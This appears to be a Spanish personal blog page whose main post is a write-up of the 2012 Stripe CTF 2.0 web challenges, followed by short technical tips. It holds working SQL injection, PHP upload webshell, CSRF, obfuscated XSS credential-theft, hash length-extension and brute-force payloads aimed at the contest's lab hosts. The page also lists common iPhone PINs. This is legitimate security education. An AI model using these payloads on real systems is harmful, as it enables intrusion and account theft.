Urdiendo

Stripe CTF 2 Write-up

2013-03-16T16:51:00.000+01:00

Copia de la entrada que publiqué en hackplayers con el solucionario del CTF 2.0 de Stripe.
Al final llegó el premio :)

------------------------------------

https://stripe.com/blog/capture-the-flag-20

Hay 9 niveles donde nos proporcionan una introducción y el código fuente del servicio a atacar. Todo el código que nos proporcionan lo he subido a https://github.com/dalvarezs

Nivel 0

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we've prepared a list of helpful resources for you. You can chat with fellow solvers in the CTF chatroom (also accessible in your favorite IRC client at irc://irc.stripe.com:+6697/ctf).

We'll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes...

You can access the Secret Safe at https://level00-1.stripe-ctf.com/user-czemoskhjv. The Safe's code is included below, and can also be obtained via git clone https://level00-1.stripe-ctf.com/user-czemoskhjv/level00-code.

Revisando el código en ruby rápidamente se ve que la vulnerabilidad es una inyección de código SQL en una sentencia con LIKE.

El código vulnerable en el fichero level00.js es:

app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

             renderPage(res, {namespace: namespace, secrets: secrets});
           });
  } else {
    renderPage(res, {});
  }
});

Enviando el carácter % en el parámetro namespace se obtienen todos los valores almacenados, obteniendo el password MTNzeALlbv.

Nivel 1

Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you'll be given the password to access Level 2! We've been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn't be able to extract the password anyway), so you'll probably just have to try all the possible combinations. Or will you...?

You can play the Guessing Game at https://level01-2.stripe-ctf.com/user-fidecfsyim. The code for the Game can be obtained from git clone https://level01-2.stripe-ctf.com/user-fidecfsyim/level01-code, and is also included below.

La aplicación espera en el parámetro attempt la contraseña, sin embargo, leyendo el código (esta vez en php) te das cuenta de que es posible enviar un parámetro con el nombre de la variable filename que será el utilizado por el codigo php, en vez de 'secret-combination.txt'.

De esta forma podemos controlar la condición “if ($attempt === $combination)” obteniendo el password EzErXetuTd.

<?php
      $filename = 'secret-combination.txt';
      extract($_GET);
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "<p>How did you know the secret combination was" .
               " $combination!?</p>";
          $next = file_get_contents('level02-password.txt');
          echo "<p>You've earned the password to the access Level 2:" .
               " $next</p>";
        } else {
          echo "<p>Incorrect! The secret combination is not $attempt</p>";
        }
      }
    ?>

Payload: https://level01-2.stripe-ctf.com/user-fidecfsyim?attempt=&filename=

Nivel 2

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at https://level02-2.stripe-ctf.com/user-uvgjkctugx. You may even be able to find the password for Level 3 by doing so.

The code for the Social Network can be obtained from git clone https://level02-2.stripe-ctf.com/user-uvgjkctugx/level02-code, and is also included below.

En este nivel tenemos una Red social donde se permite subir un fichero como imagen para el perfil.
La vulnerabilidad está en que la aplicación permite subir cualquier fichero, por lo que se puede enviar código php.
En el código dado se hace referencia al fichero password.txt. Solo queda subir un fichero que muestre su contenido:

 <?php echo file_get_contents("../password.txt"); ?>

Password HpTCvSQLKQ.

Nivel 3

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.

A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out at https://level03-1.stripe-ctf.com/user-qjthblpqly. As usual, you can fetch the code for the level (and some sample data) via git clone https://level03-1.stripe-ctf.com/user-qjthblpqly/level03-code, or you can read the code below.

Accediendo a la web se solicita usuario y contraseña para obtener el secreto. Además, nos dice que el usuario bob almacena el secreto para el paso al nivel 4.

Revisando el código (ahora toca python) se ve que se ejecuta la sentencia SQL que no está siendo filtrada:

 query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)

Además, se utiliza el hash de la contraseña con un salt:

calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

Cuando usuario y contraseña son correctos, se asigna a la sesión el id del usuario, por lo que el objetivo de esta prueba es obtener el id del usuario bob para que nos muestre el secreto. Para ello necesitamos que nos asigne su user_id, habiendo pasado las comprobaciones de usuario y contraseña:

 flask.session['user_id'] = user_id

Mediante una inyección SQL en el parámetro username se fuerza a que el id que devuelva sea el del usuario bob. Se envió una petición POST con los parámetros:

username='+UNION+SELECT+id,+'fb8e20fc2e4c3f248c60c39bd652f3c1347298bb977b8b4d5903b85055620603',+'b'+FROM+users+WHERE+username%3d'bob'--&password=a

Estos valores son calculados con el objetivo de que la condición “if calculated_hash.hexdigest() != password_hash:” se cumpla. Para ello se ha calculado los password_hash estableciendo como password 'a' y como salt 'b':

>>> hashlib.sha256('a'+'b').hexdigest()
'fb8e20fc2e4c3f248c60c39bd652f3c1347298bb977b8b4d5903b85055620603'

Recargando la web se obtiene el password ZZFMsfXAhg. Este nivel empezaba a ser más divertido!

Nivel 4

The Karma Trader is the world's best way to reward people for good deeds: https://level04-4.stripe-ctf.com/user-lkfvmdujam. You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you're transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.

The very active user karma_fountain has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for karma_fountain's account will give you access to Level 5.

You can obtain the full, runnable source for the Karma Trader from git clone https://level04-4.stripe-ctf.com/user-lkfvmdujam/level04-code. We've included the most important files below.

Por la descripción, el objetivo está claro: conseguir que el usuario karma_fountain nos transfiera crédito para que nos muestre su contraseña.

En el código se puede ver cómo se realizan las transferencias:

post '/transfer' do
      redirect '/' unless @user

      from = @user[:username]
      to = params[:to]
      amount = params[:amount]

      die("Please fill out all the fields.", :home) unless amount && to
      amount = amount.to_i
      die("Invalid amount specified.", :home) if amount <= 0
      die("You cannot send yourself karma!", :home) if to == from
      unless DB.conn[:users][:username => to]
        die("No user with username #{to.inspect} found.", :home)
      end

      unless user_has_infinite_karma?
        if @user[:karma] < amount
          die("You only have #{@user[:karma]} karma left.", :home)
        end
      end

      DB.conn[:transfers].insert(:from => from, :to => to, :amount => amount)
      DB.conn[:users].where(:username=>from).update(:karma => :karma - amount)
      DB.conn[:users].where(:username=>to).update(:karma => :karma + amount)

El campo from no se pasa por parámetro y no podemos manipularlo. Por otro lado, el registro de usuarios se hace mediante:

post '/register' do
      username = params[:username]
      password = params[:password]
      unless username && password
        die("Please specify both a username and a password.", :register)
      end

      unless username =~ /^\w+$/
        die("Invalid username. Usernames must match /^\w+$/", :register)
      end

      unless DB.conn[:users].where(:username => username).count == 0
        die("This username is already registered. Try another one.",
            :register)
      end

A diferencia del username, la contraseña no se está validando.
Por lo tanto, el objetivo es mediante un ataque de Cross-Site Request Forgery forzar a que el usuario karma_fountain nos haga una transferencia. Para ello, creamos un usuario con contraseña:

  <form action="https://level04-4.stripe-ctf.com/user-lkfvmdujam/transfer" method="post" id="pr">
            <input type="hidden" name="to" value="david" />
            <input type="hidden" name="amount" value="1" />
        </form>
        <script>
            document.getElementById('pr').submit();
        </script>

Y hacemos una donación al usuario karma_fountain para que reciba nuestro código mediante la contraseña. El usuario karma_fountain es un bot que se conecta periódicamente por lo que nos realizará la transferencia.

La password ZXVuTozhJX.

Nivel 5:

Many attempts have been made at creating a federated identity system for the web (see OpenID, for example). However, none of them have been successful. Until today.

The DomainAuthenticator is based off a novel protocol for establishing identities. To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials to the pingback URL, which returns either "AUTHENTICATED" or "DENIED". If "AUTHENTICATED", the site considers you signed in as a user for the pingback domain.

You can check out the Stripe CTF DomainAuthenticator instance here: https://level05-1.stripe-ctf.com/user-ujgjbpdotv. We've been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine...

To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. Though, you've heard that someone forgot to internally firewall off the high ports from the Level 2 server.

Interesting in setting up your own DomainAuthenticator? You can grab the source from git clone https://level05-1.stripe-ctf.com/user-ujgjbpdotv/level05-code, or by reading on below

Por la introducción no se tiene muy claro que hay que hacer, revisando el código se extrae:
Necesitamos que se cumpla la condición “if host =~ PASSWORD_HOSTS” para que nos muestre la contraseña:

     user = session[:auth_user]
      host = session[:auth_host]
      if user && host
        output += " You are authenticated as #{user}@#{host}. 

"
        if host =~ PASSWORD_HOSTS
          output += " Since you're a user of a password host and all,"
          output += " you deserve to know this password: #{PASSWORD} 

"
        end
      end

# Run with the production file on the server
    if File.exists?('production')
      PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/
      ALLOWED_HOSTS = /\.stripe-ctf\.com$/
    else
      PASSWORD_HOSTS = /^localhost$/
      ALLOWED_HOSTS = //
    end

Por lo tanto, hosts tiene que seguir el patrón /^level05-\d+\.stripe-ctf\.com$/

Para asignar un valor a la variable host:

if authenticated?(body)
        session[:auth_user] = username
        session[:auth_host] = host
        return "Remote server responded with: #{body}." \
               " Authenticated as #{username}@#{host}!"

se debe cumplir “if authenticated?(body)”
def authenticated?(body)
      body =~ /[^\w]AUTHENTICATED[^\w]*$/
    end

Después de esto el objetivo es conseguir que al hacer una petición la variable hosts cumpla el patrón anterior. Por la descripción sabemos que la máquina solo puede hacer peticiones a servidores con dominio stripe-ctf.com, por lo que usaremos el servidor del nivel 2 para subir un fichero con el texto “-AUTHENTICATED”.
Finalmente se ejecutó una petición POST con:

pingback=https://level05-1.stripe-ctf.com/user-ujgjbpdotv/?pingback=https://level02-2.stripe-ctf.com/user-uvgjkctugx/uploads/lvl5.txt&username=david&password=2

Nivel 6:

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most steamlined way of sharing updates with your friends. You can access your Streamer instance here: https://level06-2.stripe-ctf.com/user-axbechwixy

The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you've learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user.

As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.

Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone https://level06-2.stripe-ctf.com/user-axbechwixy/level06-code. We've also included the most important files below.

Tras leer la descripción, el objetivo está claro:

Necesitamos que el usuario level07-password-holder publique su contraseña en los mensajes. Sin embargo, esta vez para postear un mensaje hay que conocer un token no predecible para evitar ataques Cross-Site Request Forgery.

Revisando el código se ve que únicamente se está haciendo un filtrado de los caracteres ' y “:

 if value.kind_of?(String) &&
            (value.include?('"') || value.include?("'"))
          raise "Value has unsafe characters"
        end

Por lo que es posible realizar un Cross-Site Scripting inyectando un código que obtenga la contraseña, y publique un mensaje extrayendo el valor del token.

Los mensajes que se muestran a los usuarios están incluidos en un JSON:

  var post_data = [{"time":"Fri Aug 24 11:23:42 +0000 2012","title":"Hello World","user":"level07-password-holder","id":null,"body":"Welcome to Streamer, the most streamlined way of sharing\nupdates with your friends!\n\nOne great feature of Streamer is that no password resets are needed. I, for\nexample, have a very complicated password (including apostrophes, quotes, you\nname it!). But I remember it by clicking my name on the right-hand side and\nseeing what my password is.\n\nNote also that Streamer can run entirely within your corporate firewall. My\nmachine, for example, can only talk directly to the Streamer server itself!"}];

Por lo que el payload queda:

$.ajax({
                    type: 'GET',
                        url: 'user_info',
                        success: function(msg){
                                    var a =$('[name=_csrf]').val();
                                    var msg2= msg.replace(/"/g, 'bbbbbbbbbbbbbb');
                                    var msg3=msg2.replace(/'/g, 'eeeeeeeeeeeeeee');
                                    $.ajax({
                                        type: 'POST',
                                        url: 'ajax/posts',
                                        data: {
                                              'title': 'titulo',
                                              'body': msg3,
                                              '_csrf': a
                                              },
                                        success: function(msg){
                                                    alert("fuck CSRF");
                                         }
                                    });
                        }
                });

Mediante la petición a user_info, se obtiene la contraseña y con ella se realiza una petición de publicar un mensaje extrayendo el valor del token. Además, como la contraseña del usuario contiene caracteres no permitidos ( ' y “), nos lo dicen en la descripción, se reemplazan por otro código.

Finalmente hay que codificar el código jquery para evitar problemas con las comillas y se envía la siguiente petición POST:

title=testing&amp;body=}]&lt;/script&gt;&lt;script&gt;eval(String.fromCharCode(36, 46, 97, 106, 97, 120, 40, 123, 116, 121, 112, 101, 58, 32, 39, 71, 69, 84, 39, 44, 117, 114, 108, 58, 32, 39, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39, 44, 32, 115, 117, 99, 99, 101, 115, 115, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 109, 115, 103, 41, 123, 32, 118, 97, 114, 32, 99, 115, 114, 102, 32, 61, 36, 40, 39, 91, 110, 97, 109, 101, 61, 95, 99, 115, 114, 102, 93, 39, 41, 46, 118, 97, 108, 40, 41, 59, 32, 118, 97, 114, 32, 109, 115, 103, 50, 61, 32, 109, 115, 103, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 34, 47, 103, 44, 32, 39, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 39, 41, 59, 32, 118, 97, 114, 32, 109, 115, 103, 51, 61, 109, 115, 103, 50, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 39, 47, 103, 44, 32, 39, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 39, 41, 59, 32, 36, 46, 97, 106, 97, 120, 40, 123, 32, 116, 121, 112, 101, 58, 32, 39, 80, 79, 83, 84, 39, 44, 32, 117, 114, 108, 58, 32, 39, 97, 106, 97, 120, 47, 112, 111, 115, 116, 115, 39, 44, 32, 100, 97, 116, 97, 58, 32, 123, 32, 39, 116, 105, 116, 108, 101, 39, 58, 32, 39, 116, 105, 116, 117, 108, 111, 39, 44, 32, 39, 98, 111, 100, 121, 39, 58, 32, 109, 115, 103, 51, 44, 32, 39, 95, 99, 115, 114, 102, 39, 58, 32, 99, 115, 114, 102, 32, 125, 44, 32, 115, 117, 99, 99, 101, 115, 115, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 109, 115, 103, 41, 123, 32, 97, 108, 101, 114, 116, 40, 34, 102, 117, 99, 107, 32, 67, 83, 82, 70, 34, 41, 59, 125, 125, 41, 59, 125, 125, 41, 59))&lt;/script&gt;&lt;script&gt;var t = [{&amp;_csrf=Z%2FTINtE2srx4T5WwCFSv6zkOrRJo3NDUk8T5L5%2Fi27g%3D

Cuando el usuario level07-password-holder se conecte obtendremos el password 'frHrvqmmtcXV".

Nivel 7:

Welcome to the penultimate level, Level 7.
WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.

Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter's first premium subscribers.

Log in to your account at https://level07-2.stripe-ctf.com/user-vnnjojikfr with username ctf and password password. You will find your API credentials after logging in. You can fetch the code for the level via
git clone https://level07-2.stripe-ctf.com/user-vnnjojikfr/level07-code, or you can read it below. You may find the sample API client in client.py particularly helpful.

Revisando el código destaca:

 def _signature(self, message):
        h = hashlib.sha1()
        h.update(self.api_secret + message)
        return h.hexdigest()

y viendo las peticiones que se realizan para hacer los pedidos:

https://level07-2.stripe-ctf.com/user-vnnjojikfr/orders
count=1&lat=1&user_id=5&long=1&waffle=liege|sig:0eeddfae9869844170ba0ceeb871c562152dd251

se extrae que es vulnerable a un ataque hash length extension. Para estos ataques hay una herramienta que nos hace todo el trabajo gracias a vnsecurity (http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack/). Solo hace falta conocer la longitud de la contraseña, mensaje original, hash original y el mensaje que queremos añadir. El tamaño de la contraseña lo podemos obtener del código, aunque un ataque de fuerza bruta hubiera valido:

def add_waffles(level_password):
    add_waffle('liege', 1, level_password)
    add_waffle('dream', 1, rand_alnum(14))
    add_waffle('veritaffle', 0, rand_alnum(14))

Como se permitía acceder a los pedidos de otros usuarios, con una petición a https://level07-2.stripe-ctf.com/user-vnnjojikfr/logs/1 es posible obtener el mensaje original “count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo”

Ejecutamos la herramienta y enviamos el resultado:

python sha-padding.py 14 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' '0cae013e74d62f65b1802c5d780e7180983d8dbd' '&waffle=liege'

https://level07-2.stripe-ctf.com/user-vnnjojikfr/orders
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege

Nivel 8:

El nivel más complejo con diferencia. Por cuestiones personales, solo pude estar con el CTF el 23-24 y 28-29, cuando desbloquee el nivel ya había dos pistas. No se si estaban dadas desde el principio o fue pasados los días:

Welcome to the final level, Level 8.
HINT 1: No, really, we're not looking for a timing attack.
HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?
UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag won't change.

Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You've recently learned that the Flag itself is protected in a PasswordDB instance, accesible at https://level08-2.stripe-ctf.com/user-veyrdiujkx/.

PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["mysite.com:3000", ...]} to PasswordDB, which will respond with a {"success": true}" or {"success": false}" to you and your specified webhook endpoints.

(For example, try running curl https://level08-2.stripe-ctf.com/user-veyrdiujkx/ -d '{"password": "password-to-check", "webhooks": []}'.)

In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers' respective existences. Instead, the password is "chunked" across multiple processes, called "chunk servers". These may live on the same machine as the HTTP-accepting "primary server", or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using unequitable amounts of CPU time (relative to other PasswordDB instances on the same machine).

As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It's almost like someone on the inside is helping you — there's an sshd running on the Level 2 server as well.)

To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server.

You can obtain the code for PasswordDB from git clone https://level08-2.stripe-ctf.com/user-veyrdiujkx/level08-code, or simply read the source below.

No fue rápido ver cuál era el objetivo, en este caso con el código que nos habían dado monté en local el servicio para hacer las pruebas. Cuando se realizaba una petición:

curl http://127.0.0.1 -d '{"password": "123456789012", "webhooks": []}'

se obtenía {"success": false} o {"success": true}. Añadiendo un webhook se recibía el resultado en forma de petición POST. Analizando el funcionamiento del servicio se extrae:

Un servidor principal maneja una contraseña numérica de 12 dígitos que es divida en 4 trozos. Estos trozos son gestionados por servicios individuales.
Cuando se envía una petición al servidor principal, este consulta, por orden y uno por uno, a los servicios individuales. Si uno de los servicios responde al servidor principal que no es correcto, este no realiza más peticiones al resto de servicios individuales y contesta con false.

Nos interesaría atacar a los servicios individuales con una fuerza bruta a 3 dígitos puesto que es más rápido que atacar al servidor con fuerza bruta de 12 dígitos, pero no se tiene acceso a estos servicios, por lo que se descarta. En las pistas iniciales indicaban que no se trataba de un ataque basado en el tiempo (timming attack) por lo que se desecha la opción.

Decidí acudir al IRC que estaba montado para el CTF para ver que comentaba el resto de participantes sobre la prueba, y ahí obtuve una pista: tenía que revisar toda la conexión. Por lo que hice un script que mostrara los datos de la conexión: host y puerto origen, el resto de datos host-puerto destino y el mensaje ya lo conocía. Cuando lancé el script en local, pude extraer el patrón:

python ports.py 
('127.0.0.1', 38251)
('127.0.0.1', 38254)
('127.0.0.1', 38257)
('127.0.0.1', 38260)
('127.0.0.1', 38263)
('127.0.0.1', 38266)
('127.0.0.1', 38269)

Enviando diferentes contraseñas se deduce que si el primer trozo de la contraseña es erróneo, hay un salto de 3 en el número de puerto, si el primer trozo es correcto pero el segundo no, hay un salto de 4 en el número de puerto:

('127.0.0.1', 42120)
('127.0.0.1', 42124)
('127.0.0.1', 42128)
('127.0.0.1', 42132)
('127.0.0.1', 42136)
('127.0.0.1', 42140)

Así hasta que obtenemos los tres primeros trozos, para sacar el cuarto trozo y por lo tanto la contraseña, se hizo una fuerza bruta al servidor principal.
En local el patrón era bastante regular por lo que se daba la diferencia de +3, +4 o +5 en el número de puerto; sin embargo, cuando se realizó contra el servidor del nivel 8 debido a la carga de este se recibían diferencias mayores a pesar de que la contraseña fuera incorrecta por lo que en esos casos había que repetir la consulta para esa contraseña.

El código para la consulta del primer trozo es:

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from time import sleep
import string
import httplib
import os


srv8 = "level08-2.stripe-ctf.com"
srv2 = "level02-2.stripe-ctf.com"
cont = 0 # contador de posicion
rangoVal= range(999) # rango de valores posibles 
lastPort = 0 # ultimo puerto
class Manejador(BaseHTTPRequestHandler):
        def do_POST(self):
            global srv2, cont, lastPort, rangoVal
            self.send_response(200)
            self.wfile.write("ook");

            print str(rangoVal[cont]).zfill(3) + "-000-000-000",
            print "Diferencia: " + str(self.client_address[1] - lastPort),
            if self.client_address[1] - lastPort == 3:
                        print "Password incorrecta"
                        rangoVal.remove(rangoVal[cont])
            elif len(rangoVal) == 1:
                        print "Password: " + str(rangoVal[0])
                        os._exit(1)
            else:
                        print "Diferencia erronea"

            lastPort = self.client_address[1]
            print rangoVal
            cont = cont + 1
            if cont >= len(rangoVal):
                cont = 0
            c = httplib.HTTPConnection(srv8, 443)
            passwd = str(rangoVal[cont]).zfill(3) + "000000000"
            print "Password?: " + passwd
            c.request("POST", "/user-veyrdiujkx", '{"password": "' + passwd + '", "webhooks": ["'+srv2+':43278"] }')
            sleep(0.2)
            c.close()

def main():
        try:
            srv = HTTPServer(('0.0.0.0', 43278), Manejador)
            print "WebHook:  :43278"
            srv.serve_forever()
        except KeyboardInterrupt:
            srv.socket.close()

if __name__ == '__main__':
        main()

En la descripción nos indicaban que se tenía acceso por ssh al servidor del nivel 2, por lo que se utilizó para ejecutar el código. El script queda esperando a una primera petición, por lo que mediante curl se realizó la petición:

curl https://level08-2.stripe-ctf.com/user-veyrdiujkx/ -d '{"password": "000000000000", "webhooks": ["http://level02-2.stripe-ctf.com:43278"]}'

Hay soluciones mucho más eficientes, pero dado que tenía poco tiempo busqué la forma más rápida de codificar algo que funcionara y me diese la solución. De hecho hubo hasta un nivel extra no-oficial para ver quien sacaba la password más rápido con su script.

Si os interesan otras soluciones al nivel 8, en la siguiente web hay un listado:
https://docs.google.com/spreadsheet/ccc?key=0AqPyYgZlFopxdHBYSjJyY1V3dFdUN1hvMVB5cUU0Nnc#gid=0

El CTF ha sido divertido, ha excepción del nivel 8 las pruebas eran fáciles de ver qué es lo que teníamos que hacer para conseguir la contraseña. La variedad de lenguajes utilizados(php ruby python) también le ha dado un toque al juego.
Para terminar, dar las gracias a Stripe por montar el reto y por la camiseta para los ganadores!

Hay bastantes y muy buenas soluciones al CTF, con otras formas de resolverlo:

http://blog.ioactive.com/2012/08/stripe-ctf-20-write-up.html
http://blog.spiderlabs.com/2012/08/stripe-ctf-walkthrough.html
http://abiusx.com/stripe-ctf-2-web-challenges/
http://blog.ericrafaloff.com/2012/08/24/my-stripe-ctf-play-by-play/
http://jasiek.posterous.com/stripe-ctf-20-walkthrough
http://me.veekun.com/blog/2012/08/29/stripe-ctf-2-dot-0/
http://sec.omar.li/2012/08/stripe-ctf-writeup.html
http://blog.feabhas.com/2012/08/capture-the-flag-2-0-the-after-party/
http://blog.ontoillogical.com/blog/2012/08/30/my-solutions-to-the-stripe-ctf-web-app-edition/
http://my.opera.com/devloop/blog/2012/08/30/ctf-stripe-2012-mes-solutions
http://blog.matthewdfuller.com/2012/08/stripe-capture-flag-level-by-level.html
https://github.com/lukegb/Stripe-CTF-2.0/
http://labs.excilys.com/2012/08/29/stripe-capture-the-flag-web-edition/
http://unlearningsecurity.blogspot.com.es/2012/09/stripe-capture-flag-web-edition.html
http://unlearningsecurity.blogspot.com.es/2012/09/stripe-capture-flag-web-edition_4.html
http://unlearningsecurity.blogspot.com.es/2012/09/stripe-capture-flag-web-edition_5.html

Destacar los siguientes enlaces por su forma de resolver el nivel 5 y 6, respectivamente:

http://sec.omar.li/2012/08/stripe-ctf-writeup.html
http://www.codelord.net/2012/08/30/rack-params-magic-even-got-stripe-ctf-creators/
David Alvarez - @dalvarez_s

Screen. Multiples ventanas por terminal en Linux

2013-01-27T14:02:00.000+01:00

Rápida entrada para plasmar la utilización del comando screen para Linux.

Screen te permite dejar una sesión de un terminal en background. Muy util cuando solo tienes una consola para acceder a un servidor o quieres dejar un proceso ejecutándose y cerrar el terminal actual.

Los comando son:

$> screen <programa>

Una vez dentro, puedes salir de la ventana de screen con ctrl+a+d.

Cuando quieras volver a la ventana:
$> screen -r

Comprobar huella de certificado ssl

2013-01-05T13:49:00.000+01:00

El escenario
Tenemos un servidor con un servicio a través de SSL y tenemos un certificado autofirmado / nuestra propia CA.

La pregunta
¿Cómo comprobamos la huella de un certificado ssl?

La respuesta
Con openssl y el certificado podemos extraer la huella del certificado SSL y comprobarla manualmente.

$ openssl x509 -sha1 -in apache.crt -fingerprint -noout
SHA1 Fingerprint=75:1A:1B:1E:18:A0:FB:D6:C3:F3:97:D7:35:EC:00:37:E3:6B:98:DE

$ openssl x509 -sha256 -in apache.crt -fingerprint -noout
SHA256 Fingerprint=A8:09:13:C3:91:1F:61:F3:BF:9E:E3:0B:0F:3D:1A:01:65:23:A2:98:63:9E:5E:02:8B:72:2C:66:7E:A3:A7:E4

Necesitaremos saber la huella o tenerla en algún lugar seguro para poder comprobarla.

WD Mybook edition SSH o cómo hacer el "jailbreak"

2012-12-27T15:41:00.001+01:00

Breve descripción de cómo activar SSH en WD Mybook edition (white)

Desmontar la carcasa
Contectar el disco duro por SATA a otro PC
El disco está montando con particiones como un RAID

mdadm --assemble /dev/md1 /dev/sda1
mount /dev/md1 particion

Acceso al sistema de ficheros
Descomentar del fichero la entrada relativa a SSH

cat /etc/inetd.conf
netbios-ssn stream tcp nowait root /usr/local/samba/sbin/smbd smbd -s/etc/smb.conf -l/var/log -d0
#swat stream tcp nowait root /usr/local/samba/sbin/swat swat -a -d 1 -l /var/log
#tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd -c -s /tftpboot
ssh stream tcp nowait root /usr/sbin/sshd sshd -i
#telnet stream tcp nowait root /usr/sbin/telnetd telnetd

Desmontar el dispositivo y dejarlo como RAID

umount particion

mdadm --stop /dev/md1

Como grabar un streaming con VLC

2011-12-27T14:29:00.000+01:00

Como grabar un streaming con VLC

Medio --> Abrir volcado de red
Elegir Emitir, en el botón a la izquierda de Reproducir

Pulsar siguiente

Seleccionar "Mostrar en local" para ver y grabar a la vez
Elegir opciones de codificación
Pulsar "Añadir" archivo y elegir donde almacenar la grabación
Pulsar "Emitir" para comenzar a visualizar y a grabar el streaming

Contraseñas frecuentes en IPhone

2011-06-17T17:30:00.000+02:00

Si tienes un móvil y quieres probar combinaciones aquí tienes algunas de las más usadas:

0000; 2580; 1111; 5555; 5683; 0852; 2222; 1212 y 1998.

Leer más: Segu-Info: "1234", la contraseña favorita en el iPhone http://blog.segu-info.com.ar/2011/06/1234-la-contrasena-favorita-en-el.html#ixzz1PY0IlpLC

Hay que resaltar:
"La contraseña menos previsible de las más usadas es el 5683 que en viejos teclados con más de un signo por tecla coincidía con la palabra "love". Las diez combinaciones reseñadas representan el 15% entre 10.000 combinaciones posibles. Con una tasa de acceso del 15%, ello supone que uno de cada siete móviles puede abrirse con este tipo de contraseñas.

Los números 9, 8, 7 y 6 son los menos usados para iniciar la contraseña. El mejor consejo es buscar una combinación realmente aleatoria, el problema es que es más difícil de recordar."

Leer más: Segu-Info: "1234", la contraseña favorita en el iPhone http://blog.segu-info.com.ar/2011/06/1234-la-contrasena-favorita-en-el.html#ixzz1PY0nPZRT

Autor del estudio: http://amitay.us/blog/files/most_common_iphone_passcodes.php

Guardar cookies en python

2011-06-11T17:27:00.000+02:00

Post rápido para no volvernos locos manejando cookies en python.

Si quieres guardar las cookies en un fichero hay que establecer ignore_discard=True en los métodos load y save:

cookies.load(ignore_discard=True)

cookies.save(ignore_discard=True)

Solución leída en: http://stackoverflow.com/questions/3630307/cookiejarlib-wont-save-cookies-back-to-file

Más info web oficial: http://docs.python.org/library/cookielib.html

vi shell

2011-06-04T14:15:00.001+02:00

Buenas,

Leyendo sobre las CTF quals de Defcon 18 me encuentro con una interesante característica de Vi. Ejecución de una shell mediante el editor de texto.

Mas info:http://blog.stalkr.net/2010/05/defcon-18-ctf-quals-writeup-trivial-200.html

Un resumen de lo expuesto:
------------------------------------------------------------------------------
A few useful VIM commands:

